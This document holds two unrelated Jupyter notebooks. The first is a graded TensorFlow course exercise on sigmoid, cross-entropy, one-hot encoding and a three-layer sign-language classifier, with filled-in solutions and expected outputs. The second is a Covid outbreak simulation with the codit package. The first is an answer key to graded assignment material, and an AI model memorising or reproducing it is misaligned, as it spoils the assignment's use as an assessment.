1.2 - Computing the sigmoid Great! You just implemented a linear function. Tensorflow offers a variety of commonly used neural network functions like `tf.sigmoid` and `tf.softmax`. For this exercise lets compute the sigmoid function of an input. You will do this exercise using a placeholder variable `x`. When running the session, you should use the feed dictionary to pass in the input `z`. In this exercise, you will have to (i) create a placeholder `x`, (ii) define the operations needed to compute the sigmoid using `tf.sigmoid`, and then (iii) run the session. ** Exercise **: Implement the sigmoid function below. You should use the following: - `tf.placeholder(tf.float32, name = "...")`- `tf.sigmoid(...)`- `sess.run(..., feed_dict = {x: z})`Note that there are two typical ways to create and use sessions in tensorflow: **Method 1:**```pythonsess = tf.Session() Run the variables initialization (if needed), run the operationsresult = sess.run(..., feed_dict = {...})sess.close() Close the session```**Method 2:**```pythonwith tf.Session() as sess: run the variables initialization (if needed), run the operations result = sess.run(..., feed_dict = {...}) This takes care of closing the session for you :)``` ###Code # GRADED FUNCTION: sigmoid def sigmoid(z): """ Computes the sigmoid of z Arguments: z -- input value, scalar or vector Returns: results -- the sigmoid of z """ ### START CODE HERE ### ( approx. 4 lines of code) # Create a placeholder for x. Name it 'x'. x = tf.placeholder(tf.float32, name='x') # compute sigmoid(x) sigmoid = tf.sigmoid(x) # Create a session, and run it. Please use the method 2 explained above. # You should use a feed_dict to pass z's value to x. with tf.Session() as sess: # Run session and call the output "result" result = sess.run(sigmoid, feed_dict={x:z}) ### END CODE HERE ### return result print ("sigmoid(0) = " + str(sigmoid(0))) print ("sigmoid(12) = " + str(sigmoid(12))) ###Output sigmoid(0) = 0.5 sigmoid(12) = 0.999994 ###Markdown *** Expected Output ***: **sigmoid(0)**0.5 **sigmoid(12)**0.999994 **To summarize, you how know how to**:1. Create placeholders2. Specify the computation graph corresponding to operations you want to compute3. Create the session4. Run the session, using a feed dictionary if necessary to specify placeholder variables' values. 1.3 - Computing the CostYou can also use a built-in function to compute the cost of your neural network. So instead of needing to write code to compute this as a function of $a^{[2](i)}$ and $y^{(i)}$ for i=1...m: $$ J = - \frac{1}{m} \sum_{i = 1}^m \large ( \small y^{(i)} \log a^{ [2] (i)} + (1-y^{(i)})\log (1-a^{ [2] (i)} )\large )\small\tag{2}$$you can do it in one line of code in tensorflow!**Exercise**: Implement the cross entropy loss. The function you will use is: - `tf.nn.sigmoid_cross_entropy_with_logits(logits = ..., labels = ...)`Your code should input `z`, compute the sigmoid (to get `a`) and then compute the cross entropy cost $J$. All this can be done using one call to `tf.nn.sigmoid_cross_entropy_with_logits`, which computes$$- \frac{1}{m} \sum_{i = 1}^m \large ( \small y^{(i)} \log \sigma(z^{[2](i)}) + (1-y^{(i)})\log (1-\sigma(z^{[2](i)})\large )\small\tag{2}$$ ###Code # GRADED FUNCTION: cost def cost(logits, labels): """     Computes the cost using the sigmoid cross entropy          Arguments:     logits -- vector containing z, output of the last linear unit (before the final sigmoid activation)     labels -- vector of labels y (1 or 0) Note: What we've been calling "z" and "y" in this class are respectively called "logits" and "labels" in the TensorFlow documentation. So logits will feed into z, and labels into y.          Returns:     cost -- runs the session of the cost (formula (2)) """ ### START CODE HERE ### # Create the placeholders for "logits" (z) and "labels" (y) (approx. 2 lines) z = tf.placeholder(tf.float32, shape=np.shape(logits)) y = tf.placeholder(tf.float32, shape=np.shape(labels)) # Use the loss function (approx. 1 line) cost = tf.nn.sigmoid_cross_entropy_with_logits(logits=z, labels=y) # Create a session (approx. 1 line). See method 1 above. sess = tf.Session() # Run the session (approx. 1 line). cost = sess.run(cost,feed_dict={y:labels,z:logits}) # Close the session (approx. 1 line). See method 1 above. sess.close() ### END CODE HERE ### return cost logits = sigmoid(np.array([0.2,0.4,0.7,0.9])) cost = cost(logits, np.array([0,0,1,1])) print ("cost = " + str(cost)) ###Output cost = [ 1.00538719 1.03664088 0.41385433 0.39956614] ###Markdown ** Expected Output** : **cost** [ 1.00538719 1.03664088 0.41385433 0.39956614] 1.4 - Using One Hot encodingsMany times in deep learning you will have a y vector with numbers ranging from 0 to C-1, where C is the number of classes. If C is for example 4, then you might have the following y vector which you will need to convert as follows:This is called a "one hot" encoding, because in the converted representation exactly one element of each column is "hot" (meaning set to 1). To do this conversion in numpy, you might have to write a few lines of code. In tensorflow, you can use one line of code: - tf.one_hot(labels, depth, axis) **Exercise:** Implement the function below to take one vector of labels and the total number of classes $C$, and return the one hot encoding. Use `tf.one_hot()` to do this. ###Code # GRADED FUNCTION: one_hot_matrix def one_hot_matrix(labels, C): """ Creates a matrix where the i-th row corresponds to the ith class number and the jth column corresponds to the jth training example. So if example j had a label i. Then entry (i,j) will be 1. Arguments: labels -- vector containing the labels C -- number of classes, the depth of the one hot dimension Returns: one_hot -- one hot matrix """ ### START CODE HERE ### # Create a tf.constant equal to C (depth), name it 'C'. (approx. 1 line) C = tf.constant(C) # Use tf.one_hot, be careful with the axis (approx. 1 line) one_hot_matrix = tf.one_hot(labels, C, axis=0) # Create the session (approx. 1 line) sess = tf.Session() # Run the session (approx. 1 line) one_hot = sess.run(one_hot_matrix) # Close the session (approx. 1 line). See method 1 above. sess.close() ### END CODE HERE ### return one_hot labels = np.array([1,2,3,0,2,1]) one_hot = one_hot_matrix(labels, C = 4) print ("one_hot = " + str(one_hot)) ###Output one_hot = [[ 0. 0. 0. 1. 0. 0.] [ 1. 0. 0. 0. 0. 1.] [ 0. 1. 0. 0. 1. 0.] [ 0. 0. 1. 0. 0. 0.]] ###Markdown **Expected Output**: **one_hot** [[ 0. 0. 0. 1. 0. 0.] [ 1. 0. 0. 0. 0. 1.] [ 0. 1. 0. 0. 1. 0.] [ 0. 0. 1. 0. 0. 0.]] 1.5 - Initialize with zeros and onesNow you will learn how to initialize a vector of zeros and ones. The function you will be calling is `tf.ones()`. To initialize with zeros you could use tf.zeros() instead. These functions take in a shape and return an array of dimension shape full of zeros and ones respectively. **Exercise:** Implement the function below to take in a shape and to return an array (of the shape's dimension of ones). - tf.ones(shape) ###Code # GRADED FUNCTION: ones def ones(shape): """ Creates an array of ones of dimension shape Arguments: shape -- shape of the array you want to create Returns: ones -- array containing only ones """ ### START CODE HERE ### # Create "ones" tensor using tf.ones(...). (approx. 1 line) ones = tf.ones(shape) # Create the session (approx. 1 line) sess = tf.Session() # Run the session to compute 'ones' (approx. 1 line) ones = sess.run(ones) # Close the session (approx. 1 line). See method 1 above. sess.close() ### END CODE HERE ### return ones print ("ones = " + str(ones([3]))) ###Output ones = [ 1. 1. 1.] ###Markdown **Expected Output:** **ones** [ 1. 1. 1.] 2 - Building your first neural network in tensorflowIn this part of the assignment you will build a neural network using tensorflow. Remember that there are two parts to implement a tensorflow model:- Create the computation graph- Run the graphLet's delve into the problem you'd like to solve! 2.0 - Problem statement: SIGNS DatasetOne afternoon, with some friends we decided to teach our computers to decipher sign language. We spent a few hours taking pictures in front of a white wall and came up with the following dataset. It's now your job to build an algorithm that would facilitate communications from a speech-impaired person to someone who doesn't understand sign language.- **Training set**: 1080 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (180 pictures per number).- **Test set**: 120 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (20 pictures per number).Note that this is a subset of the SIGNS dataset. The complete dataset contains many more signs.Here are examples for each number, and how an explanation of how we represent the labels. These are the original pictures, before we lowered the image resolutoion to 64 by 64 pixels. **Figure 1**: SIGNS dataset Run the following code to load the dataset. ###Code # Loading the dataset X_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_dataset() ###Output _____no_output_____ ###Markdown Change the index below and run the cell to visualize some examples in the dataset. ###Code # Example of a picture index = 0 plt.imshow(X_train_orig[index]) print ("y = " + str(np.squeeze(Y_train_orig[:, index]))) ###Output y = 5 ###Markdown As usual you flatten the image dataset, then normalize it by dividing by 255. On top of that, you will convert each label to a one-hot vector as shown in Figure 1. Run the cell below to do so. ###Code # Flatten the training and test images X_train_flatten = X_train_orig.reshape(X_train_orig.shape[0], -1).T X_test_flatten = X_test_orig.reshape(X_test_orig.shape[0], -1).T # Normalize image vectors X_train = X_train_flatten/255. X_test = X_test_flatten/255. # Convert training and test labels to one hot matrices Y_train = convert_to_one_hot(Y_train_orig, 6) Y_test = convert_to_one_hot(Y_test_orig, 6) print ("number of training examples = " + str(X_train.shape[1])) print ("number of test examples = " + str(X_test.shape[1])) print ("X_train shape: " + str(X_train.shape)) print ("Y_train shape: " + str(Y_train.shape)) print ("X_test shape: " + str(X_test.shape)) print ("Y_test shape: " + str(Y_test.shape)) ###Output number of training examples = 1080 number of test examples = 120 X_train shape: (12288, 1080) Y_train shape: (6, 1080) X_test shape: (12288, 120) Y_test shape: (6, 120) ###Markdown **Note** that 12288 comes from $64 \times 64 \times 3$. Each image is square, 64 by 64 pixels, and 3 is for the RGB colors. Please make sure all these shapes make sense to you before continuing. **Your goal** is to build an algorithm capable of recognizing a sign with high accuracy. To do so, you are going to build a tensorflow model that is almost the same as one you have previously built in numpy for cat recognition (but now using a softmax output). It is a great occasion to compare your numpy implementation to the tensorflow one. **The model** is *LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX*. The SIGMOID output layer has been converted to a SOFTMAX. A SOFTMAX layer generalizes SIGMOID to when there are more than two classes. 2.1 - Create placeholdersYour first task is to create placeholders for `X` and `Y`. This will allow you to later pass your training data in when you run your session. **Exercise:** Implement the function below to create the placeholders in tensorflow. ###Code # GRADED FUNCTION: create_placeholders def create_placeholders(n_x, n_y): """ Creates the placeholders for the tensorflow session. Arguments: n_x -- scalar, size of an image vector (num_px * num_px = 64 * 64 * 3 = 12288) n_y -- scalar, number of classes (from 0 to 5, so -> 6) Returns: X -- placeholder for the data input, of shape [n_x, None] and dtype "float" Y -- placeholder for the input labels, of shape [n_y, None] and dtype "float" Tips: - You will use None because it let's us be flexible on the number of examples you will for the placeholders. In fact, the number of examples during test/train is different. """ ### START CODE HERE ### (approx. 2 lines) X = tf.placeholder(dtype=tf.float32, shape=[n_x, None]) Y = tf.placeholder(dtype=tf.float32, shape=[n_y, None]) ### END CODE HERE ### return X, Y X, Y = create_placeholders(12288, 6) print ("X = " + str(X)) print ("Y = " + str(Y)) ###Output X = Tensor("Placeholder_2:0", shape=(12288, ?), dtype=float32) Y = Tensor("Placeholder_3:0", shape=(6, ?), dtype=float32) ###Markdown **Expected Output**: **X** Tensor("Placeholder_1:0", shape=(12288, ?), dtype=float32) (not necessarily Placeholder_1) **Y** Tensor("Placeholder_2:0", shape=(10, ?), dtype=float32) (not necessarily Placeholder_2) 2.2 - Initializing the parametersYour second task is to initialize the parameters in tensorflow.**Exercise:** Implement the function below to initialize the parameters in tensorflow. You are going use Xavier Initialization for weights and Zero Initialization for biases. The shapes are given below. As an example, to help you, for W1 and b1 you could use: ```pythonW1 = tf.get_variable("W1", [25,12288], initializer = tf.contrib.layers.xavier_initializer(seed = 1))b1 = tf.get_variable("b1", [25,1], initializer = tf.zeros_initializer())```Please use `seed = 1` to make sure your results match ours. ###Code # GRADED FUNCTION: initialize_parameters def initialize_parameters(): """ Initializes parameters to build a neural network with tensorflow. The shapes are: W1 : [25, 12288] b1 : [25, 1] W2 : [12, 25] b2 : [12, 1] W3 : [6, 12] b3 : [6, 1] Returns: parameters -- a dictionary of tensors containing W1, b1, W2, b2, W3, b3 """ tf.set_random_seed(1) # so that your "random" numbers match ours ### START CODE HERE ### (approx. 6 lines of code) W1 = tf.get_variable('W1', [25, 12288], initializer = tf.contrib.layers.xavier_initializer(seed = 1)) b1 = tf.get_variable('b1', [25, 1], initializer = tf.zeros_initializer()) W2 = tf.get_variable('W2', [12, 25], initializer = tf.contrib.layers.xavier_initializer(seed = 1)) b2 = tf.get_variable('b2', [12, 1], initializer = tf.zeros_initializer()) W3 = tf.get_variable('W3', [6, 12], initializer = tf.contrib.layers.xavier_initializer(seed = 1)) b3 = tf.get_variable('b3', [6, 1], initializer = tf.zeros_initializer()) ### END CODE HERE ### parameters = {"W1": W1, "b1": b1, "W2": W2, "b2": b2, "W3": W3, "b3": b3} return parameters tf.reset_default_graph() with tf.Session() as sess: parameters = initialize_parameters() print("W1 = " + str(parameters["W1"])) print("b1 = " + str(parameters["b1"])) print("W2 = " + str(parameters["W2"])) print("b2 = " + str(parameters["b2"])) ###Output W1 = <tf.Variable 'W1:0' shape=(25, 12288) dtype=float32_ref> b1 = <tf.Variable 'b1:0' shape=(25, 1) dtype=float32_ref> W2 = <tf.Variable 'W2:0' shape=(12, 25) dtype=float32_ref> b2 = <tf.Variable 'b2:0' shape=(12, 1) dtype=float32_ref> ###Markdown **Expected Output**: **W1** **b1** **W2** **b2** As expected, the parameters haven't been evaluated yet. 2.3 - Forward propagation in tensorflow You will now implement the forward propagation module in tensorflow. The function will take in a dictionary of parameters and it will complete the forward pass. The functions you will be using are: - `tf.add(...,...)` to do an addition- `tf.matmul(...,...)` to do a matrix multiplication- `tf.nn.relu(...)` to apply the ReLU activation**Question:** Implement the forward pass of the neural network. We commented for you the numpy equivalents so that you can compare the tensorflow implementation to numpy. It is important to note that the forward propagation stops at `z3`. The reason is that in tensorflow the last linear layer output is given as input to the function computing the loss. Therefore, you don't need `a3`! ###Code # GRADED FUNCTION: forward_propagation def forward_propagation(X, parameters): """ Implements the forward propagation for the model: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX Arguments: X -- input dataset placeholder, of shape (input size, number of examples) parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2", "W3", "b3" the shapes are given in initialize_parameters Returns: Z3 -- the output of the last LINEAR unit """ # Retrieve the parameters from the dictionary "parameters" W1 = parameters['W1'] b1 = parameters['b1'] W2 = parameters['W2'] b2 = parameters['b2'] W3 = parameters['W3'] b3 = parameters['b3'] ### START CODE HERE ### (approx. 5 lines) # Numpy Equivalents: Z1 = tf.add(tf.matmul(W1, X), b1) # Z1 = np.dot(W1, X) + b1 A1 = tf.nn.relu(Z1) # A1 = relu(Z1) Z2 = tf.add(tf.matmul(W2, A1), b2) # Z2 = np.dot(W2, a1) + b2 A2 = tf.nn.relu(Z2) # A2 = relu(Z2) Z3 = tf.add(tf.matmul(W3, A2), b3) # Z3 = np.dot(W3,A2) + b3 ### END CODE HERE ### return Z3 tf.reset_default_graph() with tf.Session() as sess: X, Y = create_placeholders(12288, 6) parameters = initialize_parameters() Z3 = forward_propagation(X, parameters) print("Z3 = " + str(Z3)) ###Output Z3 = Tensor("Add_2:0", shape=(6, ?), dtype=float32) ###Markdown **Expected Output**: **Z3** Tensor("Add_2:0", shape=(6, ?), dtype=float32) You may have noticed that the forward propagation doesn't output any cache. You will understand why below, when we get to brackpropagation. 2.4 Compute costAs seen before, it is very easy to compute the cost using:```pythontf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits = ..., labels = ...))```**Question**: Implement the cost function below. - It is important to know that the "`logits`" and "`labels`" inputs of `tf.nn.softmax_cross_entropy_with_logits` are expected to be of shape (number of examples, num_classes). We have thus transposed Z3 and Y for you.- Besides, `tf.reduce_mean` basically does the summation over the examples. ###Code # GRADED FUNCTION: compute_cost def compute_cost(Z3, Y): """ Computes the cost Arguments: Z3 -- output of forward propagation (output of the last LINEAR unit), of shape (6, number of examples) Y -- "true" labels vector placeholder, same shape as Z3 Returns: cost - Tensor of the cost function """ # to fit the tensorflow requirement for tf.nn.softmax_cross_entropy_with_logits(...,...) logits = tf.transpose(Z3) labels = tf.transpose(Y) ### START CODE HERE ### (1 line of code) cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels)) ### END CODE HERE ### return cost tf.reset_default_graph() with tf.Session() as sess: X, Y = create_placeholders(12288, 6) parameters = initialize_parameters() Z3 = forward_propagation(X, parameters) cost = compute_cost(Z3, Y) print("cost = " + str(cost)) ###Output cost = Tensor("Mean:0", shape=(), dtype=float32) ###Markdown **Expected Output**: **cost** Tensor("Mean:0", shape=(), dtype=float32) 2.5 - Backward propagation & parameter updatesThis is where you become grateful to programming frameworks. All the backpropagation and the parameters update is taken care of in 1 line of code. It is very easy to incorporate this line in the model.After you compute the cost function. You will create an "`optimizer`" object. You have to call this object along with the cost when running the tf.session. When called, it will perform an optimization on the given cost with the chosen method and learning rate.For instance, for gradient descent the optimizer would be:```pythonoptimizer = tf.train.GradientDescentOptimizer(learning_rate = learning_rate).minimize(cost)```To make the optimization you would do:```python_ , c = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y})```This computes the backpropagation by passing through the tensorflow graph in the reverse order. From cost to inputs.**Note** When coding, we often use `_` as a "throwaway" variable to store values that we won't need to use later. Here, `_` takes on the evaluated value of `optimizer`, which we don't need (and `c` takes the value of the `cost` variable). 2.6 - Building the modelNow, you will bring it all together! **Exercise:** Implement the model. You will be calling the functions you had previously implemented. ###Code def model(X_train, Y_train, X_test, Y_test, learning_rate = 0.0001, num_epochs = 1500, minibatch_size = 32, print_cost = True): """ Implements a three-layer tensorflow neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SOFTMAX. Arguments: X_train -- training set, of shape (input size = 12288, number of training examples = 1080) Y_train -- test set, of shape (output size = 6, number of training examples = 1080) X_test -- training set, of shape (input size = 12288, number of training examples = 120) Y_test -- test set, of shape (output size = 6, number of test examples = 120) learning_rate -- learning rate of the optimization num_epochs -- number of epochs of the optimization loop minibatch_size -- size of a minibatch print_cost -- True to print the cost every 100 epochs Returns: parameters -- parameters learnt by the model. They can then be used to predict. """ ops.reset_default_graph() # to be able to rerun the model without overwriting tf variables tf.set_random_seed(1) # to keep consistent results seed = 3 # to keep consistent results (n_x, m) = X_train.shape # (n_x: input size, m : number of examples in the train set) n_y = Y_train.shape[0] # n_y : output size costs = [] # To keep track of the cost # Create Placeholders of shape (n_x, n_y) ### START CODE HERE ### (1 line) X, Y = create_placeholders(n_x, n_y) ### END CODE HERE ### # Initialize parameters ### START CODE HERE ### (1 line) parameters = initialize_parameters() ### END CODE HERE ### # Forward propagation: Build the forward propagation in the tensorflow graph ### START CODE HERE ### (1 line) Z3 = forward_propagation(X, parameters) ### END CODE HERE ### # Cost function: Add cost function to tensorflow graph ### START CODE HERE ### (1 line) cost = compute_cost(Z3, Y) ### END CODE HERE ### # Backpropagation: Define the tensorflow optimizer. Use an AdamOptimizer. ### START CODE HERE ### (1 line) optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-08).minimize(cost) ### END CODE HERE ### # Initialize all the variables init = tf.global_variables_initializer() # Start the session to compute the tensorflow graph with tf.Session() as sess: # Run the initialization sess.run(init) # Do the training loop for epoch in range(num_epochs): epoch_cost = 0. # Defines a cost related to an epoch num_minibatches = int(m / minibatch_size) # number of minibatches of size minibatch_size in the train set seed = seed + 1 minibatches = random_mini_batches(X_train, Y_train, minibatch_size, seed) for minibatch in minibatches: # Select a minibatch (minibatch_X, minibatch_Y) = minibatch # IMPORTANT: The line that runs the graph on a minibatch. # Run the session to execute the "optimizer" and the "cost", the feedict should contain a minibatch for (X,Y). ### START CODE HERE ### (1 line) _ , minibatch_cost = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y}) ### END CODE HERE ### epoch_cost += minibatch_cost / num_minibatches # Print the cost every epoch if print_cost == True and epoch % 100 == 0: print ("Cost after epoch %i: %f" % (epoch, epoch_cost)) if print_cost == True and epoch % 5 == 0: costs.append(epoch_cost) # plot the cost plt.plot(np.squeeze(costs)) plt.ylabel('cost') plt.xlabel('iterations (per tens)') plt.title("Learning rate =" + str(learning_rate)) plt.show() # lets save the parameters in a variable parameters = sess.run(parameters) print ("Parameters have been trained!") # Calculate the correct predictions correct_prediction = tf.equal(tf.argmax(Z3), tf.argmax(Y)) # Calculate accuracy on the test set accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float")) print ("Train Accuracy:", accuracy.eval({X: X_train, Y: Y_train})) print ("Test Accuracy:", accuracy.eval({X: X_test, Y: Y_test})) return parameters ###Output _____no_output_____ ###Markdown Run the following cell to train your model! On our machine it takes about 5 minutes. Your "Cost after epoch 100" should be 1.016458. If it's not, don't waste time; interrupt the training by clicking on the square (⬛) in the upper bar of the notebook, and try to correct your code. If it is the correct cost, take a break and come back in 5 minutes! ###Code parameters = model(X_train, Y_train, X_test, Y_test) ###Output Cost after epoch 0: 1.855702 Cost after epoch 100: 1.016458 Cost after epoch 200: 0.733102 Cost after epoch 300: 0.572940 Cost after epoch 400: 0.468774 Cost after epoch 500: 0.381021 Cost after epoch 600: 0.313822 Cost after epoch 700: 0.254158 Cost after epoch 800: 0.203829 Cost after epoch 900: 0.166421 Cost after epoch 1000: 0.141486 Cost after epoch 1100: 0.107580 Cost after epoch 1200: 0.086270 Cost after epoch 1300: 0.059371 Cost after epoch 1400: 0.052228 ###Markdown **Expected Output**: **Train Accuracy** 0.999074 **Test Accuracy** 0.716667 Amazing, your algorithm can recognize a sign representing a figure between 0 and 5 with 71.7% accuracy.**Insights**:- Your model seems big enough to fit the training set well. However, given the difference between train and test accuracy, you could try to add L2 or dropout regularization to reduce overfitting. - Think about the session as a block of code to train the model. Each time you run the session on a minibatch, it trains the parameters. In total you have run the session a large number of times (1500 epochs) until you obtained well trained parameters. 2.7 - Test with your own image (optional / ungraded exercise)Congratulations on finishing this assignment. You can now take a picture of your hand and see the output of your model. To do that: 1. Click on "File" in the upper bar of this notebook, then click "Open" to go on your Coursera Hub. 2. Add your image to this Jupyter Notebook's directory, in the "images" folder 3. Write your image's name in the following code 4. Run the code and check if the algorithm is right! ###Code import scipy from PIL import Image from scipy import ndimage ## START CODE HERE ## (PUT YOUR IMAGE NAME) my_image = "thumbs_up.jpg" ## END CODE HERE ## # We preprocess your image to fit your algorithm. fname = "images/" + my_image image = np.array(ndimage.imread(fname, flatten=False)) my_image = scipy.misc.imresize(image, size=(64,64)).reshape((1, 64*64*3)).T my_image_prediction = predict(my_image, parameters) plt.imshow(image) print("Your algorithm predicts: y = " + str(np.squeeze(my_image_prediction))) ###Output Your algorithm predicts: y = 3
share/codit/notebooks/overview.ipynb
###Markdown We begin with boilerplate: ###Code %matplotlib inline import matplotlib.pyplot as plt plt.rcParams["figure.figsize"] = [12, 5] %load_ext autoreload %autoreload 2 import numpy as np import random import pandas as pd import os import sys import logging logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s', level=logging.INFO) ###Output _____no_output_____ ###Markdown Covid epidemic simulator ###Code from codit.disease import Covid from codit.outbreak import Outbreak from codit.population.networks.city import CityPopulation from codit.population.covid import PersonCovid import codit.society as society import codit.config ###Output _____no_output_____ ###Markdown Baseline config of the simulation ###Code codit.config.print_baseline_config() ###Output CROSS_IMMUNITY {'other': {'other'}, 'SARS-CoV-2': {'SARS-CoV-2', 'B.1.1.7'}, 'B.1.1.7': {'SARS-CoV-2', 'B.1.1.7'}} DAILY_TEST_CAPACITY_PER_HEAD 0.0075 DAYS_BEFORE_INFECTIOUS 4 DAYS_INFECTIOUS_TO_SYMPTOMS 2 DAYS_OF_SYMPTOMS 5 DEFAULT_COVID SARS-CoV-2 DURATION_OF_ISOLATION 10 MEAN_NETWORK_SIZE 9.0 PROB_APPLY_FOR_TEST_IF_SYMPTOMS 0.75 PROB_GET_TEST_IF_TRACED 0.75 PROB_INFECT_IF_TOGETHER_ON_A_DAY {'SARS-CoV-2': 0.025, 'B.1.1.7': 0.039} PROB_ISOLATE_IF_SYMPTOMS 0.75 PROB_ISOLATE_IF_TESTPOS 0.3 PROB_ISOLATE_IF_TRACED 0.3 PROB_NON_C19_SYMPTOMS_PER_DAY 0.01 PROB_SYMPTOMATIC 0.6 PROB_TEST_IF_REQUESTED 1 PROB_TRACING_GIVEN_CONTACT 0.6000000000000001 SIMULATOR_PERIODS_PER_DAY 1 TEST_DAYS_ELAPSED 1 VACCINATION_IMMUNITY {'AstraZeneca': {'SARS-CoV-2', 'B.1.1.7'}, 'Pfizer': {'SARS-CoV-2', 'B.1.1.7'}} _PROPORTION_OF_INFECTED_WHO_GET_TESTED 0.44999999999999996 _TARGET_R0 1.4 ###Markdown We are going to work with a small town of a few thousand people. ###Code pop = CityPopulation(560000, society.Society()) ###Output 2021-03-28 19:59:40,688 INFO:Building a set of 224000 households from which to build a population 2021-03-28 20:00:33,047 INFO:220051 households of mean size 2.54 2021-03-28 20:00:35,895 INFO:101252 buildings of mean size 5.53 2021-03-28 20:01:00,548 INFO:1461 classrooms of mean size 28.87 2021-03-28 20:01:00,792 INFO:99 care_homes of mean size 105.68 2021-03-28 20:01:01,845 INFO:65449 workplaces of mean size 5.62 2021-03-28 20:01:07,712 INFO:0% of workplaces closed by lockdown, leaving 54869 open, of average Income Decile 5.07 (and st dev 3.13). 2021-03-28 20:01:07,878 INFO:0% of classrooms closed by lockdown, leaving 1185 open, of average Income Decile 4.75 (and st dev 3.10). 2021-03-28 20:01:07,912 INFO:Adding 276204 permanent contact groups 2021-03-28 20:01:08,060 INFO:Adding 28000 ephemeral contact pairs 2021-03-28 20:01:08,845 INFO:Adding 168417 contacts each within one of the 101252 buildings (contact density of 0.75) ###Markdown Randomly, we put them into fixed and overlapping social groupings, where each person has a small network. ###Code nets = [len(p.contacts) for p in pop.people] np.mean(nets) plt.hist(nets, cumulative=True, density=True, bins=2000) plt.title('Distribution of network sizes') plt.axvline(np.mean(nets), color='r') plt.grid() ###Output _____no_output_____ ###Markdown Finally ready to simulate: We will place the population that we have created, into various settings and societies in the upcoming simulations ###Code POP_SIZE = len(pop.people) PREVALENCE = 1/560 * 4 SCALE_SETTINGS = dict(n_days = 201, pop_size = POP_SIZE, seed_size = int(POP_SIZE*PREVALENCE), population=pop) SCALE_SETTINGS ###Output _____no_output_____ ###Markdown Our baseline simulation is of a runaway infection.We start with 400 people infected in a population of 56,000.We begin by studying a society where people don't know whether or how to self-isolate: ###Code s_basic = society.Society(config=dict(PROB_ISOLATE_IF_SYMPTOMS = 0)) o_basic = Outbreak(s_basic, Covid(), **SCALE_SETTINGS).simulate() o_basic.plot(title=str(SCALE_SETTINGS)) ###Output 2021-03-28 20:38:36,570 INFO: Realized R0 of early infections is 1.48 2021-03-28 20:38:36,570 INFO: 56.8 percent of the population was infected during the epidemic ###Markdown Lets put that on a log scale: ###Code o_basic.plot(logy=True, title='Non-isolating society: doubling time of about 15 days') ###Output 2021-03-28 20:38:40,830 INFO: Realized R0 of early infections is 1.48 2021-03-28 20:38:40,831 INFO: 56.8 percent of the population was infected during the epidemic ###Markdown Next, suppose that people know to isolate if they show symptoms, and 75% do so - this is similar to what is going on in the UK now: ###Code s_isolate = society.Society(config=dict(PROB_ISOLATE_IF_SYMPTOMS = 0.75)) o_isolate = Outbreak(s_isolate, Covid(), **SCALE_SETTINGS).simulate() o_isolate.plot(title='Isolating society: small but nasty wave') ###Output 2021-03-28 20:45:01,048 INFO: Realized R0 of early infections is 1.14 2021-03-28 20:45:01,049 INFO: 27.5 percent of the population was infected during the epidemic ###Markdown So, now we can add testing: * initially, here, lets suppose that positive test results are just ignored, while -ve results let people out of isolation: ###Code s_testignored = society.TestingSociety(config=dict(PROB_ISOLATE_IF_TESTPOS=0)) o_testignored = Outbreak(s_testignored, Covid(), **SCALE_SETTINGS).simulate() o_testignored.plot(title="Testing, but +ve results ignored: in a sense this is counterproductive \n" "(-ve result puts people back into society, and into harm's way)") ###Output 2021-03-28 20:54:03,948 INFO: Realized R0 of early infections is 1.21 2021-03-28 20:54:03,950 INFO: 31.9 percent of the population was infected during the epidemic ###Markdown * Now suppose that people respond to test results, some of the time: ###Code o_test = Outbreak(society.TestingSociety(), Covid(), **SCALE_SETTINGS).simulate() o_test.plot(title="Testing, paid attention to a bit") ###Output 2021-03-28 21:03:20,224 INFO: Realized R0 of early infections is 1.16 2021-03-28 21:03:20,225 INFO: 30.5 percent of the population was infected during the epidemic ###Markdown We add contact-tracing and isolation: ###Code o_test_trace = Outbreak(society.TestingTracingSociety(), Covid(), **SCALE_SETTINGS).simulate() o_test_trace.plot(title='Testing, tracing, and isolating', secondary_y=['prop_infected']) ###Output 2021-03-28 21:13:00,473 INFO: Realized R0 of early infections is 0.97 2021-03-28 21:13:00,474 INFO: 10.1 percent of the population was infected during the epidemic ###Markdown UK society, however, is characterized by testing bottlenecks: ###Code import codit.society.alternatives as alternatives o_UK = Outbreak(alternatives.UKSociety(), Covid(), **SCALE_SETTINGS).simulate() o_UK.plot(title='UK society with TTI bottlenecks - people isolate for longer') o_contact_test = Outbreak(society.ContactTestingSociety(), Covid(), **SCALE_SETTINGS).simulate() o_contact_test.plot(title="Testing, tracing&testing&isolating: " "Also testing contacts doesn't make much difference", secondary_y=['prop_infected']) census = pop.census infector_nets = [len(census[p.infectors[0]].contacts) for p in pop.people if p.infectors] infected_nets = [len(p.contacts) for p in pop.people if p.infected] def most_connected_infector(guy): if len(guy.infectors) == 0: raise NotImplementedError return max([len(i.contacts) for i in guy.chain(census) if i is not guy]) max_contacts_chain = [most_connected_infector(person) for person in pop.people if len(person.infectors)] opts = dict(cumulative=True, bins=200, density=True, histtype='step') plt.hist(nets, color='k', **opts) plt.hist(infected_nets, color='r', **opts) plt.hist(infector_nets, color='b', **opts) plt.hist(max_contacts_chain, color='g', **opts) plt.title("CDFs of valency for: people (black); infected (red); infectors (blue); max connected in chains (green)") plt.axhline(1, color='k'); plt.axvline(0, color='k') plt.grid() ###Output _____no_output_____
Pathway Analysis/Case Studies/code/PyGNA workflow.ipynb
